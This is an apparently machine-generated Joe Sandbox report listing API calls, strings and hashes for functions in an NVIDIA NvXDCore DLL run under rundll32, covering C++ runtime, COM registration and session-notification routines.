APIs

Part of subcall function 00007FFDFA908344: new.LIBCMT ref: 00007FFDFA9083EE

new.LIBCMT ref: 00007FFDFA90C6F8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90C6C1

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90C6DC
new.LIBCMT ref: 00007FFDFA90C6E5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90C720
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90C73B
new.LIBCMT ref: 00007FFDFA90C744
new.LIBCMT ref: 00007FFDFA90C757

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA94689D

std::_Deallocate.LIBCONCRT ref: 00007FFDFA90C83E
std::_Deallocate.LIBCONCRT ref: 00007FFDFA90C852
std::_Deallocate.LIBCONCRT ref: 00007FFDFA90C92C

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_$ExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 16389134-0
Opcode ID: dc495a0e6454052e14fe1b7bc9e21fbe020cfb8451bceaa8f3cb355efe703794
Instruction ID: 610fa7b5e039a89509091c8ea746c94c20fb20783ccdd3f4eeda2e097a10900c
Opcode Fuzzy Hash: dc495a0e6454052e14fe1b7bc9e21fbe020cfb8451bceaa8f3cb355efe703794
Instruction Fuzzy Hash: 0891CB36B05B5984EB48DF62D060AAD3375AF48BD8B998636DE6D937D8DF38D411C300

Function 00007FFDFA909A84 Relevance: 16.7, APIs: 11, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA908344: new.LIBCMT ref: 00007FFDFA9083EE

new.LIBCMT ref: 00007FFDFA909B54
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA909B1D

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA909B38
new.LIBCMT ref: 00007FFDFA909B41
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA909B7C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA909B97
new.LIBCMT ref: 00007FFDFA909BA0
new.LIBCMT ref: 00007FFDFA909BB3

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA94689D

std::_Deallocate.LIBCONCRT ref: 00007FFDFA909C8F
std::_Deallocate.LIBCONCRT ref: 00007FFDFA909CA3
std::_Deallocate.LIBCONCRT ref: 00007FFDFA909D7D

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_$ExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 16389134-0
Opcode ID: ab537f3fa0c16dbb301228f66777314930e9b5155a757961c85d1abaafce18f8
Instruction ID: 8b49d9a488f70cf318988a16cd8e264b17255b728b66fc28167462e2428f1722
Opcode Fuzzy Hash: ab537f3fa0c16dbb301228f66777314930e9b5155a757961c85d1abaafce18f8
Instruction Fuzzy Hash: 8691BD3AB05B6984EB04DF66D4606AC33A4AB48BE4B998676DE7D937D8DF38D411C300

Function 00007FFDFA90BE6C Relevance: 16.7, APIs: 11, Instructions: 198COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA908344: new.LIBCMT ref: 00007FFDFA9083EE

new.LIBCMT ref: 00007FFDFA90BF3B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90BF04

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90BF1F
new.LIBCMT ref: 00007FFDFA90BF28
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90BF62
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90BF7D
new.LIBCMT ref: 00007FFDFA90BF86
new.LIBCMT ref: 00007FFDFA90BF99

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA94689D

std::_Deallocate.LIBCONCRT ref: 00007FFDFA90C077
std::_Deallocate.LIBCONCRT ref: 00007FFDFA90C08B
std::_Deallocate.LIBCONCRT ref: 00007FFDFA90C105

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_$ExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 16389134-0
Opcode ID: 0557fc539fd3b13ef6336e954d3c6ddc2fd49b12613d62a274dfd9371d88e244
Instruction ID: 4994701deed6eee9646699d19ec130796261cbe9f431982bf1841258af568a14
Opcode Fuzzy Hash: 0557fc539fd3b13ef6336e954d3c6ddc2fd49b12613d62a274dfd9371d88e244
Instruction Fuzzy Hash: E3817B36B05B6584EB08DF66D460AAD33B4EB48BD8B958636DF6D937D8CE38D415C300

Function 00007FFDFA9094F0 Relevance: 16.7, APIs: 11, Instructions: 198COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA908344: new.LIBCMT ref: 00007FFDFA9083EE

new.LIBCMT ref: 00007FFDFA9095BF
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA909588

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA9095A3
new.LIBCMT ref: 00007FFDFA9095AC
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA9095E6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA909601
new.LIBCMT ref: 00007FFDFA90960A
new.LIBCMT ref: 00007FFDFA90961D

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA94689D

std::_Deallocate.LIBCONCRT ref: 00007FFDFA9096FB
std::_Deallocate.LIBCONCRT ref: 00007FFDFA90970F
std::_Deallocate.LIBCONCRT ref: 00007FFDFA909789

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_$ExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 16389134-0
Opcode ID: d9af19a22b4c5c5593c74f76cba7f20ed81bb74cddd08a789ec75be8f6af4b55
Instruction ID: 66d98829049046d44fe769e5a7dccb36170864f307abed68576ac9fca0918f45
Opcode Fuzzy Hash: d9af19a22b4c5c5593c74f76cba7f20ed81bb74cddd08a789ec75be8f6af4b55
Instruction Fuzzy Hash: 60818C3AB05B5584EB18DF66D460AAC3364EB48BD8F958636DE6D937D8CF38D415C300

Function 00007FFDFA8E1070 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 256COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8DE05C: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE11F

SetEvent.KERNEL32 ref: 00007FFDFA8E11DD

Part of subcall function 00007FFDFA8DC180: CoCreateInstance.OLE32 ref: 00007FFDFA8DC21C
Part of subcall function 00007FFDFA8DC180: StringFromGUID2.OLE32 ref: 00007FFDFA8DC2CB

UnregisterTraceGuids.ADVAPI32 ref: 00007FFDFA8E1475

Strings

Unregistering AppId for NvXDCoreModule, xrefs: 00007FFDFA8E13C6
NvXDCore.cpp, xrefs: 00007FFDFA8E10A0
Unregistering server for NvXDCoreModule, xrefs: 00007FFDFA8E1261
Nvidia::UXDriver::Core::NvXDCorePlugin::OnUnInitialize, xrefs: 00007FFDFA8E10A7, 00007FFDFA8E133A
Received OnUnInitialize() from NvContainer, xrefs: 00007FFDFA8E1123
{C5EDFC9D-B018-41A4-9877-39AB18469C3A}, xrefs: 00007FFDFA8E1428
APPID, xrefs: 00007FFDFA8E141A

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CreateEventFromGuidsInit_thread_footerInstanceStringTraceUnregister
String ID: APPID$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnUnInitialize$Received OnUnInitialize() from NvContainer$Unregistering AppId for NvXDCoreModule$Unregistering server for NvXDCoreModule${C5EDFC9D-B018-41A4-9877-39AB18469C3A}
API String ID: 2576725573-2006552945
Opcode ID: 7f87d3fff44f14fdff29451ae0676118c8797f00f55233acd2d0c76cc97a0955
Instruction ID: d95ba6cdd130897267f7be7f9214ae8163c59cd2340f8afc74506138a9a0c7f8
Opcode Fuzzy Hash: 7f87d3fff44f14fdff29451ae0676118c8797f00f55233acd2d0c76cc97a0955
Instruction Fuzzy Hash: 1AC15B32B15B8289EB189F61E8A09ED33A4FF44788F800176DAAD57BADDF78D545C340

Function 00007FFDFA8AD370 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 124libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,?,00000000), ref: 00007FFDFA8AD3CC
GetProcAddress.KERNEL32(?,?,00000000,?,00000000), ref: 00007FFDFA8AD3F8
GetProcAddress.KERNEL32(?,?,00000000,?,00000000), ref: 00007FFDFA8AD424

Part of subcall function 00007FFDFA8AAB70: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
Part of subcall function 00007FFDFA8AAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE

LocalAlloc.KERNEL32(?,?,00000000,?,00000000), ref: 00007FFDFA8AD48B
LocalFree.KERNEL32 ref: 00007FFDFA8AD529

Strings

RegOpenKeyExW, xrefs: 00007FFDFA8AD3C2
RegCloseKey, xrefs: 00007FFDFA8AD41A
Advapi32.dll, xrefs: 00007FFDFA8AD3A1
RegEnumValueW, xrefs: 00007FFDFA8AD3EE

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
String ID: Advapi32.dll$RegCloseKey$RegEnumValueW$RegOpenKeyExW
API String ID: 576420853-1884500446
Opcode ID: f73ff4851a463b3f7fdb30ce46c8df8383579259be15c863f66517dffea24ec0
Instruction ID: 9a0739177086ef5c1a02b9660cbcfc3f4c991a1f86348bbbcf91d1811599e9d5
Opcode Fuzzy Hash: f73ff4851a463b3f7fdb30ce46c8df8383579259be15c863f66517dffea24ec0
Instruction Fuzzy Hash: 4D514E21B29B0351FB598B15A960B3973A4FF48BD4F444075DD6E8A7E8EF7CE4468210

Function 00007FFDFA94B830 Relevance: 15.1, APIs: 10, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B83C

Part of subcall function 00007FFDFA8B09E0: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B0A12

_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B84D

Part of subcall function 00007FFDFA971390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFDFA94B7E3), ref: 00007FFDFA97140D
Part of subcall function 00007FFDFA971390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFDFA94B7E3), ref: 00007FFDFA97144C

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA94B880
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA94B8A5
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA94B8CF
codecvt.LIBCPMT ref: 00007FFDFA94B92E
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B93E
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B94F
std::_Facet_Register.LIBCPMT ref: 00007FFDFA94B978
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA94B983

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Exception$Lockit::_Lockit::~_Throw$Facet_FileHeaderRaiseRegister__std_exception_copycodecvtstd::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 255854510-0
Opcode ID: ed07c551a77e854c79c1de7b3397ce9cd489a7c5066f8f157c8cacd063a8d667
Instruction ID: 93a4c3e1515ce2ab88883a879578b4330c6ea8df1f98984873c1041f681d0eb0
Opcode Fuzzy Hash: ed07c551a77e854c79c1de7b3397ce9cd489a7c5066f8f157c8cacd063a8d667
Instruction Fuzzy Hash: C1419622B0CA4381FB199B15D4608B96361EF847E4F9446B2DE7D87BEDDE2CE646C300

Function 00007FFDFA8AF474 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 302memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDFA8AF749
lstrcmpiW.KERNEL32 ref: 00007FFDFA8AF766
LeaveCriticalSection.KERNEL32 ref: 00007FFDFA8AF7AD
CoTaskMemAlloc.OLE32 ref: 00007FFDFA8AF502

Part of subcall function 00007FFDFA8AE7EC: CoTaskMemRealloc.OLE32 ref: 00007FFDFA8AE84B

CoTaskMemFree.OLE32 ref: 00007FFDFA8AF893

Strings

HKCR, xrefs: 00007FFDFA8AF55A
}}, xrefs: 00007FFDFA8AF650, 00007FFDFA8AF65F
HKCU{Software{Classes, xrefs: 00007FFDFA8AF5A7, 00007FFDFA8AF5B6

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Task$CriticalSection$AllocEnterFreeLeaveRealloclstrcmpi
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 581389959-1142484189
Opcode ID: 83b500bc219f83f5a889c78b078b51ac9f4a389e476ddbb3152ea271510369f6
Instruction ID: e705cb3ee8dddf47838a81865dabf21e7e1946978f474349fa9fead8497d5f99
Opcode Fuzzy Hash: 83b500bc219f83f5a889c78b078b51ac9f4a389e476ddbb3152ea271510369f6
Instruction Fuzzy Hash: 0CC1D226F19A4295FB689B61D460ABC27A1AF48794F1041B5CE3D4F3ECDE7CE865C320

Function 00007FFDFA8E0790 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 196COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8DE05C: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE11F

WTSRegisterSessionNotification.WTSAPI32 ref: 00007FFDFA8E097E
new.LIBCMT ref: 00007FFDFA8E0994
SetEvent.KERNEL32 ref: 00007FFDFA8E0B4F

Strings

NvXDCore.cpp, xrefs: 00007FFDFA8E0811, 00007FFDFA8E0820, 00007FFDFA8E0A32, 00007FFDFA8E0A41
, xrefs: 00007FFDFA8E0911
Nvidia::UXDriver::Core::NvXDCorePlugin::OnStart, xrefs: 00007FFDFA8E084D, 00007FFDFA8E085C, 00007FFDFA8E0A6E, 00007FFDFA8E0A7D
Failed to register for events. Aborting...., xrefs: 00007FFDFA8E0A9F
Received OnStart() from NvContainer, xrefs: 00007FFDFA8E087E

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: EventInit_thread_footerNotificationRegisterSession
String ID: $Failed to register for events. Aborting....$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnStart$Received OnStart() from NvContainer
API String ID: 3215995041-3029981044
Opcode ID: 5afc532b50c0a2432de28eb12ead310b30af275e68d7fd9224e065bd5a3b1fda
Instruction ID: a15d0058245e32cf23e92d15fd163cf0598552fcbf1d7f305cf5f5de70b401f3
Opcode Fuzzy Hash: 5afc532b50c0a2432de28eb12ead310b30af275e68d7fd9224e065bd5a3b1fda
Instruction Fuzzy Hash: 44A15D32A1DBC285E7689B10F4A06EA73A4FB85780F804176D6AD43BADEF7CD545CB40

Function 00007FFDFA8B029C Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 177COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32 ref: 00007FFDFA8B031C
GetLastError.KERNEL32 ref: 00007FFDFA8B0326
GetModuleFileNameW.KERNEL32 ref: 00007FFDFA8B03A3
GetModuleHandleW.KERNEL32 ref: 00007FFDFA8B041A
_invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA8B0528

Part of subcall function 00007FFDFA8AE9B0: EnterCriticalSection.KERNEL32 ref: 00007FFDFA8AE9E3
Part of subcall function 00007FFDFA8AE9B0: LeaveCriticalSection.KERNEL32 ref: 00007FFDFA8AEA04

Strings

REGISTRY, xrefs: 00007FFDFA8B0538
Module, xrefs: 00007FFDFA8B04AD
Module_Raw, xrefs: 00007FFDFA8B04C9

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
